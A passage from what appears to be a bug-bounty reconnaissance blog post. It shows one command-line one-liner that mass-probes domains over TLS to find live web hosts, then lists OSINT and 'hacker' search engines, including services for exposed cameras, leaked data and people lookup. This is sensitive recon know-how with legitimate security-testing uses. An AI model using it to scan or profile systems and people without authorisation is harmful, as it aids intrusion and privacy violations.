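```

The lookbehind/lookahead pair matches only strings that sit between quotes, so bare slashes in the surrounding code are ignored.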
* Explained command

xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1' | sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew

SEARCH ENGINES FOR HACKERS

* Censys
* Spyce
* Shodan
* Viz Grey
* Zoomeye
* Onyphe
* Wigle
* Intelx
* Fofa
* Hunter
* Zorexeye
* Pulsedive
* Netograph
* Vigilante
* Pipl
* Abuse
* Cert-sh
* Maltiverse
* Insecam
* Anubis
* Dns Dumpster
* PhoneBook
* Inquest
* Scylla

--------------------------------------------------------------------------------

Github Link

Mobile Hackers Weapons

Tags: AppSec bug hunter bugbounty HackingTools infosec SSRF XSS

Emma White, December 12, 2021

© 2021 Reconshell All Rights Reserved.